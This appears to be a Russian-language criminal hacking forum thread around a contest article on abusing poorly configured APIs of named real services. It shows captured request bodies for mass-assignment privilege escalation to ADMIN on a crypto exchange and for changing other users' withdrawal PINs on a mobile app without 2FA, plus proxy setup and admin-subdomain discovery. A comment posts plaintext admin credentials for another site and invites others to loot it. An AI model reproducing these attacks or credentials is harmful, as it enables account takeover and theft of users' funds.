Статья Вскрываем сайты через кривое API

[ONION]

Я в этой теме плохо шарю а как ловят запросы ?

 

[hvb]

Я в этой теме плохо шарю а как ловят запросы ?

Снифером или просто в браузере открываешь вкладку "инструменты разработчика" и смотришь.

Но если такие вопросы задаешь, начни с базы. Какие запросы бывают, как выглядят, для чего используются. Потом разберись с json форматом, посмотри, как вообще API устроены и как с ними работают.

 

[ONION]

Снифером или просто в браузере открываешь вкладку "инструменты разработчика" и смотришь.

Но если такие вопросы задаешь, начни с базы. Какие запросы бывают, как выглядят, для чего используются. Потом разберись с json форматом, посмотри, как вообще API устроены и как с ними работают.

а вы можете посмотерть уязвим ли этот сайт baku365.com а baku365.com\admin Админка

 

[hvb]

а вы можете посмотерть уязвим ли этот сайт baku365.com а baku365.com\admin Админка

Нет, не могу)

 

[ONION]

Я СИЛЬНО СТУПИЛ

 

[ONION]

СИЛЬНО СТУПИЛ

 

[diletant]

пхаха ты че за даун
спарсили статью туда просто
да еще и внизу указали автора

 

[Dead_silence]

пхаха ты че за даун
спарсили статью туда просто
да еще и внизу указали автора

ты о чём

 

[diletant]

ты о чём

забей
чел отредачил комментарий

 

[Duble]

ты о чём

Ты собираешься статью редачить?)

 

[Guron_18]

Статьи на мильйон гривен которые мы заслужили в 2022 году от рождества бородатого дядьки. Пусть буду первый кто заминусует эту зерню. Уж простите это мало того, что не статья еще и не техническая еще и не тематическая.

 

[Duble]

Статьи на мильйон гривен которые мы заслужили в 2022 году от рождества бородатого дядьки. Пусть буду первый кто заминусует эту зерню. Уж простите это мало того, что не статья еще и не техническая еще и не тематическая.

Ну да согласен. Тоже сначала лайкнул, думал отредачит, но потом посмотрел, что автор не шевелится - убрал лайк. А вообще статью снести, надо.
Вообще ничего не раскрыто.

 

[Dead_silence]

Ну да согласен. Тоже сначала лайкнул, думал отредачит, но потом посмотрел, что автор не шевелится - убрал лайк. А вообще статью снести, надо.
Вообще ничего не раскрыто.

времени пока у меня нет

 

[mlwnow]

бу го га ...
Вы хотели тут получить НА ХАЛЯВУ способЪ взлома майкрософтЪ ?
Не смешите мои тапки)
Концепция конкурса------------->>>> Интересная статья!
Если с прикреплёным софтом -то статья будет дважды интересной НЕ ДЛЯ ПРОФИТА , А ДЛЯ ТЕСТА В БОЕВЫХ УСЛОВИЯХ И ДЛЯ ПРОВЕРКИ "ПИЗДЕЖА" ИЛИ ОТСУТСВИЯ ОНОГО В ТОПИКЕ ТС-а !!!
Иными словами школота может проверить все ето в боевых условиях.
И если школота дойтет хотя бы до половины пути , и потом споткнётся о что либо ,
то ДАЖЕ школотьа проголосует ЗА статью , и начнет задавать вопросы.
Иными словами - тема будет ЖИТЬ и поддерживаться вопросами/ответами..
Далее ............


а впрочем . кому и о чём это я........

Пишите меньше и реже.
БукАф многа !Ё
******************

Ответ НЕ в упрёк , а в отзыв тому кому меньше букаф и больше смыла нужно.
Шуруп*(Саморез)смотрине впались )
************************
Малёх дополню для детей :


никита дубов , или дубанутов или как там тебя - не нужно набивать дубы. окай ?



ВСЁ ВЕРНО -- ставим линукс , ставим мап ... сканим .. раскручиваем.. ломаем.... заливаем шел.. е6ё/\/\ врага !!!!11ЁЁЁЁёё Правильно ?
Правильно !
Суть поймали ?
А глупые идут НАХ !
LOL -
*************************************************
И это..
ПисаЙтели ВЫсШЕ !
вЫ НЕ ИЗОБРАЖАЙТЕ ИЗ СЕБЯ , ПОЖалуйста , ПОНИМАЮЩИХ ТЕМУ !
ЗЫ :

никита еблов :

Посмотреть вложение 33596

и Фторой имжесними :

Посмотреть вложение 33597

Ваши Тупые детЦские слова на форуме - ПАЛЯТ НЕ ПОДЕТЦКИ ВАШ ДЕТЦКИЙ ВОЗРАСТ .
ошибки спецом сделал , дабы дать вам пиСщю для сракатана )

*************



ОГА ёпта :


Посмотреть вложение 33598

Добрался он До понимания как РАБОТАЕТ ВЫХОД В ИНТЕРНЕТ , и сразу понял посыл конкурсной статьи..
ОГА бляд6+ .
***********

ЗЫ сракотателит и пониматели темы с одной буквы:
я ЗА то что бы конкурсная статья была понятна блондинке !
Ибо результат стоит бабла !
А платить бабло за то , что предположить можно - это не нужно только лишь !
карочи: текст + софт + ссылки на конкретный пример - это есть критерий в заявке на ПОБЕДУ.
всегда этого придерживался и всегда по этому оценивал сии темы.
смог я провернуть подобное , ПОДЧЁРКИВАЮ -** ПРОВЕРНУТЬ ... по мануалу из темы - для меня тема действующая , а значит и заявка на конкурс - ТОЖЕ ДЕЙСТВУЮЩАЯ.
если тема на конкурс - нажать кнопку в мапе на лине и пошла скульраскроутка - то сие НЕ для конкурса а для ....
а для НЕ знаю для кого .. ибо кто на лине - тот и так знает. а кто на окнах тому оно надда ?
//////////

Ебать. Я будто бы прочитал текст из 2007, не думал что люди так еще общаются, половину х#й поймешь, а ведь сколько старался что бы так красиво все оформить и написать.
Нет сорри, никаких предьяв не кидаю. Забылся что людям может быть и 40 лет здесь, а не все 25 летние пиздюки)

 

[ghostmarket09]

I didn’t really expect such feedback, people are already writing to me in PM with questions on this topic
admin if this topic is not suitable for the stupid contest due to the fact that there is no 7k character here, this is nonsense and not fair, for example, I can finish topic 1 right now with an example where such a bug can knock a top store by refilling it memory, but the meaning if I already conveyed the thought
I would like to hear the admin's answer, it makes sense to finish off the topic for these fucking 7k symbols with an example, or this rule will be revised and I will move on

No offense my friend but you honestly think too highly of your "bug" which is simply the normal and standard way to BEGIN any webapp pentest. Intercepting requests with burp or the proxy you prefer, playing with the fields by editing the data and forwarding requests to see the responses. You've described a very a simple IDOR which was not valuable/effective on your target as many are not.

Im sorry to say this but even if the competition had allowed this topic like last time then it would still not even be considered for any potential prize due to it being so basic and absolute common beginner practice. The rules for this competition were clear regardless. Also do not place so much value in random private messages from strangers and assume your topic is mindblowing. If this were a writeup on hackerone for a company then it would not even qualify for a payout

intention is not to discourage you from continuing down your path but take more time and dive deeper and be humble. Check out my article from last years competition regarding the same kind of approach but more involved with rich rewards at the end /threads/54108/

There is nothing left to complain about now, you are simply wrong and people have been overly kind to you. You overestimate both your ability and contribution by a long long way. Be good, hope success will be in your future.

 

[nobody0]

Отличная статья . Очень для меня лично актуальная , буду проверять на стОящих целях . Возможно она как то и не подходит под рамки конкурса , или чьи то надежды не оправдала. Автору - спасибо.

А кому интересно попрактиковаться на скаме (90% скам, выплаты закончились с месяц другой в usdt ^_^ ) , где правда ключей бина тыщ на 40 баксив есть (по мелочи - не обольщайтесь, если крупняк найдете на одном который проглядел - пишите как честный форумчанин - выведем) и приваткеи от кошей (вроде пустых почти)
https://ldxpay.com/userLogin/admin - пашалуста
+---------------+--------------------------------+
| uname | pwd |
+---------------+--------------------------------+
| keysadmin | jaado&Mantar@^9(* |
| administrator | leader@ofTheOpposition&ruler%* |
| manager | uperwalaDekhegaSab@kuch#$% |
там из админа можно в юзера любого залогиниться - и попробовать наоборот вышеуказанным методом.

 

[Dead_silence]

Обновил тему...

 

[NoNameUserName]

В данной статье я бы хотел показать как можно эксплуатировать плохо настроенный API.

Покажу на примере www.coinbaazar.com

1. Регистрируем аккаунт

2. Заходим в настройки аккаунта и смотрим что можно такого сменить дабы отловить обычный запрос, в нашем случае можно просто ник сменить.

Посмотреть вложение 35705

3. Ловим такой запрос

POST

https://www.coinbaazar.com/api/v1/user/updateUserInfo

{"_id":"******3f6e2f**1e900******","name":"XSS"}

Ловим программой (снифером) HttpAnalyzerStdV7 для меня он удобней в плане снифа WEB

4. В данном случае айди "_id" сайт воспринимает какому человеку менять, а name можно менять на что угодно, лично я сменил на userType для повышении привилегий

Как я обычно ищу переменную отвечающую за привилегию юзера ? всё просто ! снифаем момент авторизации, в этот момент сервер возвращает всю инфу об аккаунте, дальше остаётся только
поискать среди ответов то что нам надо

Теперь как скинуть нужный нам запрос на сервер, я использую Private Keeper в нём спакойно можно составить свой запрос но в есть более лёгкий вариант это дополнение к браузеру Tamper Dev

Tamper Dev​

Он ловит запрос и даёт вам его изменить до отправки на сервер.

То есть вам просто надо поймать момент запроса на смену данных и добавить переменную userType и поставить нужное значение.

Получилось так...

{"_id":"******3f6e2f**1e900******"","userType":"ADMIN"}

и отсылаем на сервер любым удобным способом !!!

5. Остаётся найти админку - https://admin.coinbaazar.com/ и подключится


Посмотреть вложение 35706


В моём случае Админ Панель на поддомене, для её поиска можно использовать этот сервис - https://subdomainfinder.c99.nl/ (поиск поддоменов) или этот https://suip.biz/ru/?act=subfinder

Так же можно дюпать баланс (правда бан системой сразу) менять другим юзерам почты пароли да что угодно и на что хватит фантазии...
Таких сайтов (приложений прилично встречал) везде по разному эта уязвимость действует, где то пины сменить можно без 2fa где то юзерам пароли по сносить, на всё что хватит вашей фантазии, иногда можно положить BD отправив большой обьём данных в переменой и он их сохраняет
Если кривая адмнка то можно ещё Shell пролить

Продолжаем абузить кривое API...

Возьмём другой пример, приложение на Андроид - HandyPick

Для брутфорсеров частая проблема встаёт в PIN для вывода монеток, тут рассмотрим пример как можно менять эти пины

Посмотреть вложение 35707

Видим такую картину при регистрации, печаль беда, но не спешим бросать наше дело, ставим пин и продолжаем !!!
Всё так же ловим запрос на смену данных

1. Ловим запрос
----------------------------------------------

POST

https://appapi.handypick.io/user/update

{"id":347***1,"picture":null,"nickname":"UUFh4isdfs","bio":""}

Теперь у нас приложение на телефоне и HttpAnalyzerStdV7 уже не подойдёт !!!

Для приложения я использую Fiddler 4 + NoxPlayer (эмулятор Android)

Как настроить Fiddler ?!

Во-первых, вы должны включить параметр Разрешить удаленным компьютерам подключаться в Fiddler

1. Откройте Fiddler и выберите Инструменты -> Параметры
2. Выберите вкладку Подключения
3. Установите флажок Разрешить подключение удаленных компьютеров, чтобы включить эту настройку
4. Перезапустите Fiddler, чтобы изменения вступили в силу

Fiddler теперь прослушивает порт 8888 (это порт по умолчанию, вы можете изменить его с помощью приведенных выше настроек).

Настройка устройства Android...

Как только Fiddler прослушивает, мы должны использовать его в качестве прокси-сервера в Android.

1. Откройте меню Wi-Fi.
2. Нажмите и удерживайте текущую сеть, чтобы отобразить сведения о сети
3. Выберите опцию Управление сетевыми настройками
4. Установите флажок Показывать дополнительные параметры
5. Выберите Ручной из выпадающего списка Прокси
6. Введите свой IP-адрес в поле Имя хоста прокси-сервера
7. ПРИМЕЧАНИЕ: Вы можете проверить свой IP-адрес, наведя указатель мыши на значок сетевого подключения на панели инструментов Fiddler.
8. Введите порт прослушивания Fiddler (по умолчанию 8888) в поле Порт прокси-сервера
9. Нажмите кнопку Сохранить, чтобы применить изменения

Трафик вашего устройства должен быть виден в Fiddler


При текущей настройке вы должны иметь возможность перехватывать HTTP-трафик. Однако, если вы попытаетесь открыть любой веб-сайт HTTPS, вы получите сообщение о том,
что сертификат безопасности этого сайта не является доверенным! ошибка. Чтобы исправить это, вы должны доверять корневому сертификату Fiddler.

1. В вашем браузере перейдите к http://ipv4.fiddler:8888
2. Загрузите корневой сертификат Fiddler.
3. Установите сертификат на свое устройство.

И всё теперь вы можете спокойно снифать Android приложение где нету защиты...

Так, а мы остановились на том что нам надо поймать запрос всё так же в смене никнейма в профиле

POST

https://appapi.handypick.io/user/update

{"id":347***1,"picture":null,"nickname":"UUFh4isdfs","bio":""}

-----------------------------------------------------------------------------------------------------------------

2. Теперь идём искать как называется переменная для пин кода

Так как это наш акк для теста мы просто меняем PIN и снифаем запрос получаем pincode теперь мы знаем название переменой и идём менять

Получается вот такой POST запрос

POST

https://appapi.handypick.io/user/update

{"id":34***31,"picture":null,"nickname":"UUFh4isq","bio":"","pincode":"222222"}

В этом cлучае для отправки запроса лучше конечно уже использовать Private Keeper

не забываем менять ник иначе не пропустит

"results":1

Запрос сменился данные поменялись, теперь идём на акк который хотим обнулить и проворачиваем систему, получаем PIN и выводим

Рассмотрим ещё способ как сменить он очень простой !!!

Когда меняется пин запрос вот такой

POST

https://appapi.handypick.io/user/change-pincode

{"email":"******@songsign.com","new_pincode":"111111"}

Как мы видим тут нету 2FA кода который идёт на почту, а значит это просто визуальная защита то есть приложение не как не отслеживает прошли мы 2fa для смены пина или нет и достаточно просто повторить запрос на смену

Если где то что вы недопоняли, я открыт для помощи, напишите мне в лс и я объясню.

это конечно все интересно, но ты бы расписал, что делать, если не будет поля userType при авторизации, где искать эту инфу можно, помимо ответа на авторизацию

 

[Dead_silence]

это конечно все интересно, но ты бы расписал, что делать, если не будет поля userType при авторизации, где искать эту инфу можно, помимо ответа на авторизацию

На этот вопрос нет точного ответа

 

[J3S00S]

Коинбазар пофиксили, вроде, пару дней назад нормально работало, сейчас перестало в ответе инфу о юзере выдавать и менять, поправьте если это у меня руки кривые.
(Понимаю что коинбазар здесь просто как пример, пишу просто что б новички не думали что статья не рабочая/они тупые)